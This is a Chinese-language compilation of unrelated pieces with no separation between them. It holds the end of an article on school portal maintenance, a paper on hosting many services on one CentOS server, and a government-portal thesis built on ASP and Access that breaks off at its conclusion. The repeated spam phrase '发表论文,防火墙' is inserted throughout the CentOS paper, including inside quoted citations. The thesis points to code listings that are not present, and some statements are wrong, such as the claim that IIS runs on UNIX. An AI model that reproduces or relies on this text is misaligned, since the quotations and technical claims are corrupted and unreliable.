网站硬件维护和软件更新:网站硬件维护和软件更新应该由专职技术人员负责或外包专业公司维护。中职学校门户网站一般是本校专职技术人员进行维护和更新的。这就要求管理人员首先检查网站程序的安全性,定期检查服务器和备份网站,做好杀毒软件升级和木马病毒清理等工作,防止网站被黑客进入。
网站备案:网站建立后还要在工业和信息化部ICP/IP地址/域名信息备案管理系统备案,在上级主管部门及省教育部门备案,在当地公安机关备案。其目的就是使网站合法化,防止在网上从事非法的网站经营活动,打击不良互联网信息的传播。
网站内容更新:网站内容更新就是要保证信息来源,这是中职学校门户网站的生命。它要求管理人员对信息报送的原则、信息的分类、信息报送分工、信息报送程序、信息报送考核奖励办法等作明确的规定,健全学校的网络及信息管理制度,使报送信息遵循“真实、准确、及时、规范”的原则,保证网站信息的数量和质量。
总之,中等职业学校门户网站的建设应根据各校的需求和特色,从全局出发,有组织、有计划地筹建,并不断更新、完善,保有其特定的用户,使其具有持续强大的活力。
注释
① 张海藩.软件工程导论(第5版)[M].北京:清华大学出版社,2008.9.
关键词:开源软件,FAX服务器,防火墙,mail服务器
1、企业的常用软硬件现状
随着计算机技术、网络技术和企业本身的发展,企业对计算机软件、硬件、网络(互联网、局域网)、安全(系统、网络、信息)、企业信息化的要求越来越高、分得越来越细,例如:路由器、防火墙、防毒软件、ERP服务器、数据库服务器,文件服务器,打印服务器,还有web服务器,mail 服务器,fax服务器等。因为大多数企业都使用了微软产品,依据Microsoft 技术白皮书建议,服务器只做专业服务,不建议安装其他软件系统,即不同的服务器软件要安装在不同的机器上,随着用户数(license)的增加或软件升级(升级为企业版),企业的机器数量和软硬件费用也会变得越来越多,软硬件的管理也会变得越来越复杂。
2、 企业如何降低常用软硬件的费用
降低软件的费用通常有多种方案,例如:改用价格便宜的软件;自行开发;使用linux。在以上方案中目前最有可能的方案是使用linux,这是因为"linux从1991.9正式向外公布已有近20年的历史"[3]7页,有很多发行版本及使用人群。在很多发行版中我们选择了CentOS(在R H E L基础上发展起来的)作为中小企业的服务器系统软件,理由如下:
2.1、 ”Red Hat Enterprise Linux和Fedora已经成为主流的Linux发行版” [6] 前言页;”CentOS是在Red Hat Enterprise Linux.的源代码重新编译生成的发行版本,CentOS具有和RHEL很好的兼容性,拥有RHEL的诸多优点。” [1]11页。
2.2、 ”CentOS可以算是Red Hat Enterprise Linux的克隆版,但是免费。”[3]8页;”CentOS不会遇到任何版权问题,不存在认证和支持方面的费用。发表论文,防火墙。发表论文,防火墙。”[1] 12页。
2.3、 CentOS.性能稳定:”借助CentOS.不需要商业支持就可以体验RedHat Enterprise Linux的稳定性、可靠性、和企业功能。”[6]4页;”linux可以连续运行数月、数年而无需要重新启动,与NT(死机)相比,这一点尤其突出.。” [1]7页。
2.4、 CentOS功能强大:”Linux现在已经拥有许多专业级别的数据库和办公程序集。其中不仅包括Oracle和IBM的数据库,而且还包括OpenOffice和Koffice的办公程序” [6] 15页,例如: CentOS自带图形界面、Firefox、OpenOffice和Java、C++、Perl 、PHP、Mysql,等脚本语言、程序设计语言和数据库,完全可以安装在个人电脑上使用。
2.5、远程管理方便:”使用linx远程管理十分方便:Linux可以通过命令行来操作的特点,就其本身来说十分适合进行远程管理,可以使用任何一种操作系统的机器” [5] 4页;例如:可以在windows下使用用telnet、ssh、 VNC(图形界面)远程管理CentOS系统。
2.6、”IPTABLES(linux的防火墙)已发展成为一个功能强大的防火墙,它已具备通常只会在专有的商业防火墙中才能发现的大多数功能。” [2] 1页。
2.7、”RHEL对Cpu的要求不是很高,。。。。。。如果系统单纯使用文本模式,则内存要求很低,一般的计算机内存都可以了;。。发表论文,防火墙。。。。。” [4]12页,所以安装CentOS系统时不选图形界面和汉字系统,系统速度会更快,可以将很多服务器软件安装在一台机器上,减少了机器数量和费用。也便于集中管理。
2.8、病毒少:到目前为止在CentOS系统上我们还没有发现病毒。
3、 用CentOS建立多功能服务器实现“一机多能”服务的简单说明(功能和过程):
3.1、在一台机器上安装CentOS系统(不安装图形界面和汉字)并配置DHCP、DNS、IPTABLES (防火墙+路由器)、SAMBA(文件+打印服务器)、POSTFIX(邮件服务器)、MYSQL(数据库)、FTP、TOMCAT(Web应用服务器)、Apache(WEB服务器) 、Telnet、VNC、VPN等,建立DHCP服务器、DNS服务器、防火墙、路由器(双网卡)、文件服务器、打印服务器、邮件服务器、MySQL服务器、FTP服务器、TOMCAT服务器、Apache服务器、Telnet服务器、VNC等服务器。见下面图1,安装配置过程详见CentOS的相关教程。
3.2、在多功能服务器上安装、配置开源软件HylaFAX、建立fax服务器,见上面图1“需要第三方软件支持的服务”中的FAX服务,详见HylaFAX的相关资料。
HylaFAX服务器可以实现用一个FAXmodem为局域网内所有的电脑提供传真发送功能,下面图2的左图是HylaFAX客户端监视HylaFAX收发情况的画面;下面图2的右图是用电脑发送fax的画面; 下面图3是用outlook通过多功能服务器中的邮件服务器自动接收FAX的画面(见上面图1“CentOS系统自带的服务”中的邮件服务)。发表论文,防火墙。
3.3、在多功能服务器上安装配置开源软件LeoBBS、建立论坛服务器,见上面图1“需要第三方软件支持的服务”中的论坛服务,详见LeoBBS的相关资料。下面图4是论坛主页,详见218.94.148.130/cgi-bin/leobbs/leobbs.cgi,需要Apache 和Perl环境支持。
3.4、在多功能服务器上安装、配置开源软件Sharetronix,建立微博服务器,见上面图1“需要第三方软件支持的服务”中的微博服务,详见Sharetronix的相关资料。发表论文,防火墙。
下图是微博主页,详见218.94.148.130/,需要PHP、Mysql和Apache环境支持。
3.5、在多功能服务器上安装、配置EAI软件,建立EAI服务器,见上面图1“需要第三方软件支持的服务”中的EAI服务,详见EAI的相关资料。
EAI是基于CentOS系统下用PHP+Mysql开发的异地多种数据库平台的同步软件,已经实现了两岸三地不同数据库平台(SYBASE和SQLSERVER)的相关数据的同步(包括新增、修改和删除),还有断点续传和LOG自动生成功能。下图是接收端的LOG(接收记录)。
下面是EAI实际应用情况的网络图
3.6、随着企业的发展,我们还可以随时在CentOS服务器上增加其他服务功能,例如:下图是在多功能服务器上增加了舆情监测服务平台,需要TOMCAT+JRE+MYSQL支持,
详见218.94.148.132:8080/WebNewsDisplay/show/new_login.jsp。发表论文,防火墙。
4、结束语
我们几乎是在零软件费用的情况下,在一台CentOS系统上建立了多功能的服务器系统,经过实际应用和测试,发现免费的多功能服务器系统的具有性能稳定、功能强大、方便实用等特性,相比其他产品(软件或硬件)不仅软件免费,而且在性能、功能、升级、扩展、管理等方面都非常不错,可以满足多数中小企业的基本要求,特别是可以用GHOST刻隆硬盘,在已有多功能服务器的情况下,只要30分钟左右,就可以安装一台新的多功能服务器,可以批量快速安装或作为备份使用,非常实用、方便、安全,完全可以作为中小企业免费的多功能服务器的解决方案。Mysql可以作为ERP或OA系统的后台,替代SQLSERVER等数据库,普通使用者可以用CentOS作为桌面系统,达到减少常用软硬件费用的目的,值得推广。
参考文献:
[1]梁如军,丛日权,周涛.CentOS 5系统管理[M].北京:电子工业出版,2008.7
[2](美)Michael Rash 陈健. Linux防火墙[M].北京:人民邮电出版社,2009.6
[3]曹江华著.RHEL 5.0 服务器构件与故障排除[M].北京:电子工业出版,2008.9
[4]卓文华讯,刘晓辉,陈洪彬编著.Red Hat Linux网络服务器管理及配置实战详解[M].北京:化工工业出版社,2010.4
[5]周洁、刘红兵、王国平编著.Red Hat Enterprise Linux5网络配置与管理基础与实践教程[M].北京: 电子工业出版社, 2009.2
[6][美]Richard Petersen著年孙天泽、袁文菊、李梅等译Fedora$ Red Hat Enterprise Linux参考大全[M].北京:电子工业出版社, 2009.9
政府部门门户网站建设是根据国家对政府信息公开的相关政策要求,实现部门政务信息公开的优先手段和必然选择。论文详细描述了一个基于ASP技术和ACCESS数据库系统网页的实现过程。网页设计及制作主要围绕政务公开、在线办事和网上交流三大功能进行,前台信息发布共设置领导讲话、政务公开、工作动态、政策法规等十大功能模块。后台管理采用Client/Server和Browser/Server相结合的技术方式,将超文本标记语言(HTML)和简单的JScript语言相融合开发,使用Session对象进行Web页之间的数据传递,并跟踪用户登陆,实现了不同权限用户对新闻信息的计算机网络管理和Web查询功能。网页新闻访问采用主页+标题面+子页面三级模式,主页面提供了本网页的一个宏观样式,并让各模块与之配合联系,构成一个完整的网页系统。
【关键词】
政府网站
网页制作
ASP 技术
ACCESS 数据库
【英文对照】
ABSTRACT
The portal website of government departments is the best candidate and inevitable choice for government affairs opening. Its construction is based on the related policies and regulations on government affairs opening which are enforced by the state. This paper presents the construction of one portal webpage based on ASP and ACCESS database. The design and implementation of webpage mainly consists of three parts: government affair opening, online government office, and online communication. The front-end consists of ten major modules, including leader's speech, government affair opening, government dynamics, policies and regulations etc. The backend is a hybrid of C/S and B/S technologies, HTML and JScript are combined together and session object is used for inter-page data communication and traced the status of user logon, web based lookup and remote administration of webpage are implemented and access control to user of different privileges is achieved. The access to webpage news adapts a three-tier scheme which includes main page, title page and sub-page, the main page provides the overall look-and-feel and orchestrate all the modules so to form a complete webpage.
【KeyWord】
Government website
Webpage Making
ASP
ACCESS database
【目
录】
前言 2
正文 3
第 一 章 概 述 3
1.1 网页制作背景 3
1.2 网页制作的意义 3
1.3 开发工具简介 4
第 二 章 可行性分析 5
2.1 B/S结构介绍 5
2.2 ACCESS 数据库 5
2.3 ASP 技术 5
第 三 章 网页需求分析 7
3.1 总体功能需求分析 7
3.1.1. 基本功能需求 7
3.1.2. 功能结构图 7
3.2 网页具体功能模块需求分析 8
3.2.1. 政务公开功能 8
3.2.2. 网站办事功能 8
3.2.3. 网上交流功能 8
3.3 网页结构图 9
3.4 网页版面规划 10
3.5 网站CI形象设计 10
3.6 网页布局技术 11
第 四 章 数据库设计 12
4.1 数据库概念结构设计 12
4.2 数据库逻辑结构设计 14
第 五 章 人机界面设计 17
5.1 后台登录界面设计 17
5.2 用户管理页面设计 18
5.3 信息检索页面设计 18
5.4 后台管理页面设计 19
第 六 章 系统程序设计 20
6.1 程序设计语言 20
6.2 部份源程序实现及文件 20
第 七 章 网页测试 30
7.1 测试网站的建立 30
7.1.1. 测试网站环境 30
7.1.2. Web服务器IIS5.1简介 30
7.1.3. 网页测试 30
7.2 网页发布及网站维护 31
第 八 章 结论 32
参考文献 33
致 谢 34
【前言】
在我国,继党的十六大提出推行电子政务、提高行政效率之后,十六届三中全会进一步强调要发展电子政务,提高政府的服务和管理水平。政府网站作为电子政务建设的龙头是完善政府公共服务接入渠道的主要手段,它实现了按照用户对象进行信息资源的整合,提供覆盖用户全生命周期的各种信息和服务。同时,网页信息传播的即时性和全面性确保了政府大量重要信息的广泛共享,优化了社会资源配置,让政务信息更便捷、更低成本地进行传递。通过访问政府网页,企业和社会公众可以24小时不间断地,不受任何空间界限影响地与政府进行信息交互,在促进政务公开,改进公共服务,提高行政效能,确保公众知情权、参与权和监督权等方面有着显著成效。
政府网站建设的含义就是利用Internet/Intranet等计算机通信技术,在Internet上建立正式站点,通过网络实现政府在政治、经济、社会、生活等诸多领域中的管理和服务职能,推动政府办公自动化与网上便民服务,是政府和社会互动的重要窗口。论文就巴中市网页的设计和制作作了详细描述,网页主要功能模块设置紧紧围绕部门职能职责,密切结合公众需求,实现了预期设计目标,网页经本地局域网测试运行正常。
【正文】
网页制作
第 一 章 概 述
1.1 网页制作背景
在当前这个网络时代,电子政务是各国政府倡导和推动网络化的5个重要应用领域中的首要。美国早在克林顿政府时期就开始积极倡导和推动电子政务和电子政府的建设。英国于2005年将所有的政府服务实现上网。新加坡更是从1981年就开始发展电子政务,目前其电子政务的发达程度已备受世人瞩目。在我国,政府信息门户网站作为展示政府整体形象的窗口和联系群众、服务群众的桥梁正日益得到各级政府的重视。如今,全国各地的电子政务建设已进入实质阶段,全国257个地市级城市中已经有90%的城市建立了自己的政府网站。在应用上,电子政务建设已经从网络基础建设向功能应用层面和社会服务层面转变。随着我国信息化进程的深入推进,将极大地调动整个社会活力,推动中国社会的飞速发展,并对中国未来的发展产生巨大的影响。
1.2 网页制作的意义
首先,政府网站关系到政府的服务形象,关系到百姓的切身利益。政府部门通过制作网页建立网站,是电子政务的最佳切入点和重要内容,政府网页的发展水平是衡量一个地区电子政务进程的标志。在政府网页上,政务信息公开程度,有关为民服务栏目健全情况,信息反馈情况,在线办公与网上受理情况等关系到政府的服务形象,关系到百姓的切身利益。其次,政府网页制作有利于政府各类信息的充分共享,有利于政府决策水平的不断提高。通过网页的各类平台迅速直接地获取公众的反馈信息,准确掌握外部环境,大幅提高了正确决策与快速反应的能力。随着政府各类信息的公开化,政民互动不断加强,政府将在公众面前展现出高效、透明的良好形象,这有利于提高社会凝聚力,对于维护社会稳定、促进社会发展具有重要意义。
1.3 开发工具简介
在众多的网页设计与制作工具软件中,我根据实际需求及对软件的熟悉程度,主要选取了Photoshop CS3、Fireworks 8.0、Flash MX 2004、Macromedia Dreamweaver8进行网页的开发和制作,这些软件的主要特点分述如下。
网页图像设计工具——Photoshop CS3、Fireworks 8.0
在网页制作过程中,首先要使用Photoshop或Fireworks 设计网页和整体效果图、处理网页中的图像、背景图及网页的图标、按钮等。Photoshop是平面图像处理业界霸主Adobe公司推出的跨越PC和MAC两界首屈一指的大型图像处理软件.它功能强大,操作界面友好,得到了广大第三方开发厂家的支持,从而也赢得了众多的用户的青睐。Fireworks是Adobe公司推出的著名平面图像设计和图像处理软件,它具有强大的图像处理功能和操作易用性,受到广大平面图形设计人员及专业广告设计师的青睐。它涉及图像合成、色彩校正、图层调板、通道使用、动作调板、路径工具、滤镜等图像处理功能。可制作如按钮制作、文字特效、材质纹理、三维物体、影像特效及广告创意设计等多种用途。
动画制作工具——Flash MX 2004
Flash MX 2004是Macromedia公司的一个的网页交互动画制作工具。用flash制作出来的动化是矢量的,不管怎样放大、缩小,它还是清晰可见。 用flash制作的文件很小,这样便于在互联网上传输,它还采用了数据流技术,只要下载一部分,就能欣赏动画,而且能一边播放一边传输数据。 交互性更是flash动画的迷人之处,可以通过点击按钮、选择菜单来控制动画的播放,这些优点使flash日益成为网络多媒体的主流。
网页排版工具—— Macromedia Dreamweaver 8
Macromedia Dreamweaver 8是由Macromedia公司推出的,用于网页开发和网站管理的专业化设计工具。它采用了多种新技术,具有设计和开发网站过程中需要的网站管理、网站设计、页面制作、多媒体制作和动画制作等丰富实用的功能;它具有友好的操作界面,在文档窗口中可以打开各种浮动面板,同时还可以使用系统内置的多种对象进行操作。它将可视布局工具、应用程序开发功能和代码编辑支持组合在一起,其功能强大,使得各个层次的开发人员和设计人员都能够快速创建界面吸引人的基于标准的网站和应用程序。开发人员可以使用 Dreamweaver 及所选择的服务器技术来创建功能强大的 Internet 应用程序,从而使用户能连接到数据库、Web 服务。
第 二 章 可行性分析
2.1 B/S结构介绍
B/S(Browser/Server,简称B/S)结构,即浏览器/服务器模式,它是WEB兴起后的一种网络结构模式,从传统的二层C/S结构发展而来,通常采用三层结构:浏览器-Web服务器-数据库服务器,WEB浏览器是客户端最主要的应用软件,浏览器通过Web Server 同数据库进行数据交互。
在B/S体系结构系统中,用户通过浏览器向分布在网络上的许多服务器发出请求,服务器对浏览器的请求进行处理,将用户所需信息返回到浏览器。而其余如数据请求、加工、结果返回以及动态网页生成、对数据库的访问和应用程序的执行等工作全部由Web Server完成,这样大大简化了客户端,减轻了系统维护与升级的成本和工作量,降低了用户的总体拥有成本(TCO)。
该结构的缺点是存在数据安全性问题、对服务器要求过高、数据传输速度慢、软件的个性化特点明显降低,难以实现传统模式下的特殊功能要求。
2.2 ACCESS 数据库
Access是微软公司推出的基于Windows的桌面关系数据库管理系统(RDBMS),是Office系列应用软件之一。它提供了表、查询、窗体、报表、页、宏、模块7种用来建立数据库系统的对象;提供了多种向导、生成器、模板,把数据存储、数据查询、界面设计、报表生成等操作规范化;为建立功能完善的数据库管理系统提供了方便,也使得普通用户不必编写代码,就可以完成大部分数据管理的任务。由于Access数据库的ODBC驱动程序支持的SQL指令全,执行效率高,所以Access后台数据库+ASP服务器端程序+客户端IE浏览器,是一个精练、实用、高效的组合模式。
2.3 ASP 技术
ASP是Active Server Page的缩写,意为“动态服务器页面”。ASP是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。ASP的网页文件的格式是.asp,现在常用于各种动态网站中。ASP是一种服务器端脚本编写环境,可以用来创建和运行动态网页或Web应用程序。ASP网页可以包含HTML标记、普通文本、脚本命令以及COM组件等。利用ASP可以向网页中添加交互式内容(如在线表单),也可以创建使用HTML网页作为用户界面的web应用程序。与HTML相比,ASP网页具有实现动态网页技术;包含在HTML代码所组成的文件中,易于修改和测试;可以使用服务器端ActiveX组件来执行各种各样的任务;方便连接ACCESS与SQL数据库等多种优点,其主要缺点是开发人员要有丰富的经验,否则会留出漏洞,让黑客利用进行注入攻击。安装ASP时,系统提供了两种脚本语言:VBScript和JScript,而VBScript则被作为系统默认的脚本语言。
第 三 章 网页需求分析
3.1 总体功能需求分析
网页功能分析就是以系统的观点,对已选定的对象与开发范围进行有目的、有步骤的实际调查和科学分析。分析的目的就是要弄清楚网页要做什么,最终为后面的设计工作打下基础。
该网页作为电子政务的一种服务平台,政务公开、在线办事、网上交流是其基本的三大功能。
3.1.1. 基本功能需求
政务公开功能
根据2008年5月1日起施行的政府信息公开条例规定,行政机关应当将主动公开的政府信息,通过政府公报、政府网站、新闻发布会以及报刊、广播、电视等便于公众知晓的方式公开,确保公众享有充分的知情权、监督权。
网站办事功能
网上办公办事是网页功能服务中非常重要的组成部分,是电子政务建设努力的方向。通过提供一些行政审批等项目的在线办理极大地方便了群众,减少了不必要的人为环节,节省了社会资源。
网上交流功能
通过搭建政民交流平台,让公众不但能够将自己的建议与意见直接反映给部门领导,实现普通群众参政、议政的夙愿,而且使领导能够通过这一平台,倾听民声、关注民情、体察民意,进而为群众办理更多的实事、好事、贴心事。
3.1.2. 功能结构图
3.2 网页具体功能模块需求分析
根据总体功能需求分析,该部门网页确定政务公开、工作动态、领导讲话等八大功能模块,具体组成分别如下。
3.2.1. 政务公开功能
领导讲话模块
功能:即时发布领导关于三农工作的各种会议、现场讲话。
作用:传达精神,贯彻意图。
政务公开模块
政务公开模块包含七个子模块:机构职能、领导介绍、内设科室、农口系统、人事信息、规划计划、财政信息。模块根据国家信息公开条例等法规政策要求,针对该政府部门必须公开的七个方面进行设置。
工作动态模块
工作动态模块,包含六个子模块:综合信息、新村建设、农业产业化、劳务开发、农田建设、移民工作。功能根据该政府部门各科室(办)所承担的职能职责进行设计,实现了各责任条块当前工作信息的即时公开。
政策法规模块
模块设置农业法规、政策文件两个子模块,提供近年来国家关于三农工作各种重要法规、政策的浏览和下载,同时对本区、部门关于三农工作制定的各种政策文件进行了公开,使法规政策透明化,接受公众监督。
专题专栏模块
模块包含科学发展观、调研文章、企业推介、农业前沿四个子模块。科学发展观子模块紧扣时代所需,调研文章子模块是在互联网上开辟的一个崭新的调研舞台,企业推介子模块为本地龙头企业的宣传、推广提供了一个新平台。农业前沿子模块放眼全球,宣传、推介农业领域的最新技术、最新品种。
3.2.2. 网站办事功能
网上办事模块
模块设置便民服务、服务流程、资料下载、统计报表四个子模块,将该部门能够进行网上办理的相关行政审批事项予以了公开,方便了群众,提高了办事效率,提升了部门形象。
3.2.3. 网上交流功能
在线交流模块
模块设置三农论坛、领导信箱、咨询留言、网上投诉、网上调查五个子模块。三农论坛子模块为公众之间相互交流提供了平台。领导信箱、在线咨询等四个子模块,为政府部门决策即时提供了群众的意见及建议。
联系我们模块
该模块主要功能:收集网站的反馈信息。
3.3 网页结构图
3.4 网页版面规划
全部网页采用1024×768分辨率制成,网页访问采用首页、导航页和新闻页三级页面形式。
首页
首页使用的是国字型结构布局。 国字型结构布局是一些大型网站所喜欢的类型,即最上面是网站的标题+主菜单,下半部分分为3个区域,左右分列一些两小条内容,中间是主题内容,与左右一起罗列到底,最下面是网站的一些基本信息,联系方式,版权声明等。这种布局的优点是能够充分利用版面,信息量大;缺点是页面拥挤,不够灵活。
导航页
采用拐角型布局,优点是页面结构清晰,主次分明,缺点是规矩呆板,容易让人“看之无味。
新闻页
使用标题正文型:这种类型即最上面是标题或类似的一些东西,下面是正文;本站子页大部分是这个结构。
页头
本站页头以900×150的农村风景图为底,左置“巴中市”六字及名称英文“”Office of rural affairs,Bazhou District,Bazhong City,右边放置宣传语(FLASH动画)一起构成。
页脚
本站页脚如下:
3.5 网站CI形象设计
主色调与色彩
网站采用代表了春天、希望、田野的“绿色”为主色调,与部门的农业、农村、农民三农工作性质相吻合。
字体
导航栏字体为“黑体”,14px;网站主栏目字体为“宋体”,14 px;正文字体为“宋体”,9 px;
交互方式
网站设置了专门的在线交流模块,提供了论坛、网上投诉、咨询留言、网上调查等多种交互方式。
3.6 网页布局技术
网页使用表格方式布局,同时用CSS进行样式控制。表格布局的优势在于它能对不同对象加以处理,而又不用担心不同对象之间的影响。表格布局的缺点是,当我们用了过多表格时,页面下载速度受到影响。CSS层叠样式表是W3C组织新近批准的一个辅助HTML设计的新特性,它使整个HTML保持统一的外观。过去在设置文本时,为了保持整个段落都使用相同的外观,不得不为每一段设置属性,很麻烦。采用CSS可以在设置文本之前,就指定整个文本的属性,比如颜色、字体大小等等,获得统一的文本外观。
第 四 章 数据库设计
数据库在一个网页系统中占有非常重要的地位,数据库的结构好坏将直接影响到应用系统的实现效果和数据操作效率以及能否保证数据的一致性、完整性和安全性。
4.1 数据库概念结构设计
数据库概念设计的任务是根据用户需求设计数据的概念数据模型,简称概念模型。概念模型是按用户的观点对数据和信息进行建模,是从用户的角度看到的数据库,它可以用E-R模型来表示。构成E-R图的基本要素是实体型、属性和关系,其表示方法为:实体型:用矩形表示,矩形框内写明实体名;属性:用椭圆形表示,并用无向边将其与相应的实体连接起来;关系:用菱形表示,菱形框内写明关系名,并用无向边分别将有关实体连接起来,同时在无向边旁标上联系的类型。
根据前面的需求分析,可以得到本网页数据库系统的E-R图,如图4-1所示。
上述E-R图的关系说明如下:管理员可以对所有网上调查、新闻信息、投诉留言、论坛发贴等实体进行增删编辑,它们都是1:n的关系。一个管理员可以对论坛所有注册用户进行监管,一个超级管理员可以对多个后台管理普通用户进行监管,它们的关系也都是1:n。
各实体属性的E-R图如下:
4.2 数据库逻辑结构设计
通过分析系统涉及的相关实体以及要收集、存储和操纵的数据信息,本网页数据库共设置了新闻信息表(News)等6个表,分述如下。
新闻信息表:用于存储新闻及政务信息。
表4-1 新闻信息表(News)
三农论坛表:用于存储论坛发帖。
表4-2 三农论坛表(BBS)
投诉留言表:用于存储群众来信、投诉、咨询及回复。
表4-3 投诉留言表(Message)
论坛注册用户表:用于存储三农论坛注册用户信息。
表4-4 论坛注册用户表(User)
后台管理员表:用于存储管理员姓名、密码、权限。
表4-5 后台管理员表(ManageUser)
网上调查表:用于存储网站调查项及投票。
表4-6 网上调查表(OnlineSurvey)
第 五 章 人机界面设计
5.1 后台登录界面设计
设计思想:登录页面主要实现用户的登录。通过用户名、密码、随机密码、IP、SessionID的组合验证实现未登陆用户的正常登陆和已登陆用户中同一用户名允许在同一IP上重复登陆,拒绝同一用户名在不同IP上重复登陆。
图5-1 登录流程图
图5-2 管理员登录界面
5.2 用户管理页面设计
设计思想:登录页面主要实现用户的登录,用户有超级管理员、普通管理员。超级管理员可以对其进行任何的操作,包括对普通管理员的增删、密码修改。一般用户只可以做权限之内的操作和只能对自身的信息作修改。
图5-3 用户管理流程图
图5-4 用户管理界面
5.3 信息检索页面设计
设计思想:根据输入的关键字实现单字段或多字段组合查询。
图5-5 信息检索流程图
5.4 后台管理页面设计
网站后台管理系统提供了添加新闻内容、管理全部新闻、领导信箱管理、在线咨询管理、公众留言管理、网上投诉管理、网上调查管理、信息中心管理、超级管理选项、文件上传十个功能选择项,可以完成新闻信息的在线编辑发布、咨询留言的在线回复、网上调查项的增减等管理任务。
图5-7 后台功能结构图
第 六 章 系统程序设计
前面着重讨论了系统功能模块的设计,详细分析了每一个模块的功能,本章将就系统中模块功能的具体实现,选取部分源程序进行讨论。
6.1 程序设计语言
网站主要采用ASP作为程序设计代码的开发工具。使用ASP作为开发工具可以方便地建立动态的、高性能的、安全的、跨平台的先进动态网站,其突出特点有以下几个:
ASP可以将内容的生成和显示进行分离
Web页面开发者可以用HTML或XML 标识进行对最终页面的设计,同时使用ASP Tag 或Java Script 来生成页面上的动态内容,因为所有的脚本都在服务器端运行, 所以, 如果核心逻辑部分被封装在标识中, 那么Web管理人员或页面设计者将只能编辑ASP页面的显示方式, 而不会影响其内容的实质。
对不同浏览器的兼容
由于ASP技术采用了将ASP Tag 和Java Script 在服务器端解释并执行而只将结果以HTML或XML的形式送回到客户端的方法, 从而保证了对其它基于HTML的Web浏览器的完全兼容。
6.2 部份源程序实现及文件
数据库访问技术
网页在采用微软IIS/PWS的网络平台,通过服务器端运行的ASP程序来访问后台Access数据库。数据库访问采用匿名身份验证方式,使用户无需输入用户名或密码便可以对数据库进行访问。匿名身份验证是指由 IIS创建IUSR、计算机名称、帐户(计算机名称是正在运行IIS 的服务器名称),当匿名用户请求数据库内容时IIS 会将该连接分配给 IUSER_ComputerName 帐户,其中ComputerName。默认情况下,IUSER_ComputerName 帐户为 Guests 组的成员。此组具有 NTFS 文件系统权限所规定的安全限制,这些限制指定访问级别以及可提供给公共用户的内容的类型。建立Access数据库连接的步骤及参数意义如下:
第一行程序:建立一个ADO对象集中的Connection对象,也即连接对象。这是建立数据库连接的初始步骤。执行这行程序后,Conn成为一个连接对象。
第二行程序:建立一个ADO对象集中的Recordset对象,以便利用Recordset对象操作数据库(当然,这只是对数据库操作的多种方式之一)。执行这行后,rs就成为一个Recordset对象。
第三行程序:利用连接对象Conn的Open方法打开一个指定的数据库。首先利用Server对象的MapPath函数,取得要打开数据库的完整的文件路径,并存储在变量DBQ中。其次,因为我们要打开的是Access数据库,所以要指定ODBC驱动程序参数,表示要透过Access的ODBC驱动程序来访问数据库。到这里,就已经打开了数据库名指定的数据库。
第四行程序: Sql指令串。
第五行程序:利用rs对象的Open方法打开数据库中的数据表。这其中有四个参数,其意义如下:
数据表名或SQL指令串:在这个参数里指定要打开的数据库内的数据表名称,或者是用SQL的Select指令串确定的数据表的指定范围数据
Connection对象:指定已经打开的数据库的Connection对象。
Recordset类型:表示打开数据表的方式,有四种选择。数字0表示只读方式,且当前记录只能下移;数字1表示可读写方式,当前记录可自由上下移动,但不能及时看到别的用户建立的新记录,除非重新启动;数字2表示可读写方式,当前记录可自由移动,而且可以及时看到别的用户增加的新记录;数字3表示只读方式,但当前记录可以自由移动。
锁定类型:这个参数指定数据库的锁定功能。因为网络上的数据库都是多用户的,很可能同时有多个用户在操作数据库。为了避免错误,让同一时间只可能有一个用户修改数据,就要用锁定功能。有四种选择:数字1表示只读方式锁定,用户不能更改数据;数字2表示悲观锁定,当一个用户用rs对象开始修改数据时就锁定数据库,直到用户用rs.Update更新记录后,才解除锁定;数字3表示乐观锁定,只有在数据写入数据库中的时候才锁定。数字4表示批次乐观锁定,只有在使用rs.UpdateBatch成批更新数据时候才锁定数据记录。
身份验证
本网站身份验证采用服务器端验证代码方式,密码算法采用流行的MD5算法,同时附加客户端随机密码验证。MD5全称Message-Digest Algorithm 5(信息-摘要算法),是由MIT Laboratory for Computer Science和RSA Data Security Inc的Ronald L. Rivest在90年代初向IEFT提交的一种不可逆运算加密算法,经MD2、MD3和MD4发展而来,面向32位的电脑。登陆验证按一个IP可以有多个用户登陆,一个用户只能登陆一个IP的原则进行设计,具体代码及解释如下:
网上调查功能实现
图6-1 网上调查投票界面
图6-2 网上调查结果界面
网上调查实现代码
第 七 章 网页测试
7.1 测试网站的建立
7.1.1. 测试网站环境
网页测试使用本单位局域网进行,配置如下:
服务器端:操作系统—Windows xp
Web服务器—IIS5.1
浏览器—IE6.0
客户端:Internet Explorer6.0
7.1.2. Web服务器IIS5.1简介
IIS是Internet Information Services的缩写,是目前使用最广泛的Web服务器,可以在UNIX和Windows平台上运行。它与Windows NT Server完全集成,允许使用Windows NT Server内置的安全性以及NTFS文件系统建立强大灵活的Internet/Intranet站点。IIS组件主要包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面。
7.1.3. 网页测试
IIS配置
当IIS被成功安装后,将在计算机C:\Inetpub\wwwroot下新建一个默认网站,通过修改默认网站配置可以建立自己的站点。如自己的网页放在D:\Wy目录下,首页文件名为Index.asp,其具体步骤如下:
第一步:在“默认Web站点”上单击右键,选“属性”,以进入名为“默认Web站点属性”设置界面。
第二步:转到“主目录”窗口,再在“本地路径”输入(或用“浏览”按钮选择)好自己网页所在的“D:\Wy”目录。
第三步:转到“文档”窗口,再按“添加”按钮,根据提示在“默认文档名”后输入自己网页的首页文件名“Index.asp”。
第四步:在“默认Web站点”上单击右键,选“新建虚拟目录”,依次在“别名”处输入“test”,在“目录”处输入“D:\Wy”后再按提示操作。
数据源(ODBC)配置
第一步:选择控制面板中的管理工具打开数据源(ODBC)。
第二步:在选项卡系统DNS中添加Microsoft Access Driver(*.mdb)驱动并指定数据源为网站的数据库文件。
测试
打开浏览器,直接在地址栏中输入:localhost/test/index.asp或者127.0.0.1/test/index.asp即可。
7.2 网页发布及网站维护
在测试完成后,网页就可以发布到互联网上了,接下来要做的就是网站的日常维护了。网站维护就是对服务器及相关软硬件的维护,对可能出现的问题进行评估,制定响应时间,制定相关维护规定,将网站维护制度化、规范化,主要包括以下内容:
即时更新新闻内容
留言、投诉、咨询、信箱定期回复
数据库内容定期备份、删减、分类
更正数据库使用过程中发现的问题
定期进行综合分析,不断优化数据库中数据结构,提高使用效率
在系统运行过程中应定期对管理员用户名和密码进行更新,并对IIS和NT权限作相应设置
第 八 章 结论
